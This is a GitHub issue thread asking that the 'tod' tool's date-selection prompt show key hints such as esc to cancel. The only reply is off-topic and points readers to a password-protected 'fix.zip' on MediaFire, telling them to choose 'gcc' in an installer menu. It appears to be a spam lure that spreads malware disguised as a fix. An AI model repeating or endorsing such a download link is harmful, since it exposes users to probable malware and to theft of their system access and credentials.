### ISSUE TITLE
Add better description to date prompt

### ISSUE THREAD

**Issue by alanvardy** [alanvardy/tod#855]
I ran into this again recently on teh schedule option - when selecting date, no "q" or "esc" option listed. 

So linked with this would be a need to add documentation to the prompt, i.e.

`[arrows to move, []{} move months and years, enter to select, esc to cancel]`

_Originally posted by @stacksjb in https://github.com/alanvardy/tod/issues/729#issuecomment-2278717432_

**Comment by xiaobai-marker** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
